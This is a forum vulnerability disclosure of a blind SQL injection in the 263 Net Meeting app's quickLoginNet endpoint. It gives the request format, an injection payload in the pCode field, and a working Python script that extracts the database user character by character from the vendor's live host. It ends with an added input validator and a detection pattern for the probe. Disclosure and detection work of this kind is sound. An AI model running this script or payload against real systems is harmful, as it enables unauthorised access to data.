HanDs
Administrator

[July vulnerability disclosure] A blind SQL injection in a 263 Communication app (verification script attached)



Details:

263 Net Meeting 3.0

http://www.263.net/263/download/

(screenshot: 0.jpg)





Download the app; the "Quick Join" feature calls this endpoint:

Code:
POST http://cc.263.net/rest/netmeeting/quickLoginNet HTTP/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 65
Host: cc.263.net
Connection: Keep-Alive

{"pCode":"46867588","username":"lisi","clientType":10}





Injection point: pCode



Boolean-based blind injection.



false:

(screenshot: 1.jpg)





true:

(screenshot: 2.jpg)





Database user:

Code:
[email protected]



(screenshot: 3.jpg)

Proof of vulnerability:

Python verification script:

Code:
# Python 2 script (httplib, print statement); imports and indentation restored
import httplib
import time

headers = {'Content-Type': 'application/json;charset=UTF-8'}

# Candidate characters tried for each position of the user name
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

print '[%s] Start to retrieve db user:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
isEnd = False
for i in range(1, 36):
    if isEnd:
        break
    isEnd = True
    for payload in payloads:
        url = '/rest/netmeeting/quickLoginNet'
        start_time = time.time()
        # Boolean probe: is the i-th character of user() equal to this candidate?
        data = '{"pCode":"46867588\' or MID(user(),' + str(i) + ',1)=\'' + payload + '","username":"lisi","clientType":10}'
        conn = httplib.HTTPConnection('cc.263.net', timeout=60)
        conn.request(method='POST', url=url, body=data, headers=headers)
        html_doc = conn.getresponse().read()
        conn.close()
        print '.',
        # Response code 80007 marks the "true" branch (see screenshot 2.jpg)
        if html_doc.find('80007') != -1:
            isEnd = False
            user += payload
            print '\n[in progress]', user,
            break
        time.sleep(0.1)
print '\n[Done] db user is %s' % user
time.sleep(20)

Fix:
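The fix section of the post is empty. As an added example (not the vendor's code nor the poster's), here is a server-side allow-list check for the quickLoginNet JSON body and a matching detection rule, run over constructed sample bodies modelled on the request above. It assumes a pCode is exactly 8 digits, as in the sample value "46867588"; the real format may differ.

```python
import json
import re

# Constructed sample bodies for POST /rest/netmeeting/quickLoginNet (not captured traffic).
SAMPLE_BODIES = [
    '{"pCode":"46867588","username":"lisi","clientType":10}',
    '{"pCode":"46867588\' or MID(user(),1,1)=\'R","username":"lisi","clientType":10}',
    '{"pCode":"46867588\'","username":"lisi","clientType":10}',
    '{"pCode":"4686","username":"lisi","clientType":10}',
]

# Assumption: a meeting access code is an 8-digit string (from the sample "46867588").
PCODE_RE = re.compile(r'^\d{8}$')

# Shape of the boolean probe used in the PoC: a closing quote, OR, then a
# character-extraction function such as MID()/SUBSTR().
PROBE_RE = re.compile(r"'\s*or\s+(mid|substr|substring)\s*\(", re.IGNORECASE)


def validate_quick_login(body):
    """Allow-list check to run before the value reaches any query.
    Returns (ok, reason). A parameterised query is still required;
    this check just refuses anything that is not a valid access code."""
    try:
        req = json.loads(body)
    except ValueError:
        return False, 'malformed JSON'
    pcode = req.get('pCode')
    if not isinstance(pcode, str) or not PCODE_RE.match(pcode):
        return False, 'pCode must be exactly 8 digits'
    if not isinstance(req.get('clientType'), int):
        return False, 'clientType must be an integer'
    return True, 'ok'


def classify_probe(body):
    """Detection view for alerting on request logs:
    'blind-probe'   = matches the MID()/SUBSTR() extraction shape from the PoC
    'sqli-like'     = pCode carries a quote but not that shape
    'invalid-format' = wrong length or non-digits, no quote
    'clean'         = well-formed pCode"""
    try:
        pcode = json.loads(body).get('pCode', '')
    except ValueError:
        return 'malformed'
    if not isinstance(pcode, str):
        return 'sqli-like'
    if PROBE_RE.search(pcode):
        return 'blind-probe'
    if not PCODE_RE.match(pcode):
        return 'sqli-like' if "'" in pcode else 'invalid-format'
    return 'clean'
```

Alerting on 'blind-probe' over the web-server access log catches the character-by-character extraction loop of the PoC, which produces dozens of near-identical requests differing only in the MID() offset and candidate character.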


Posted: 2016-7-9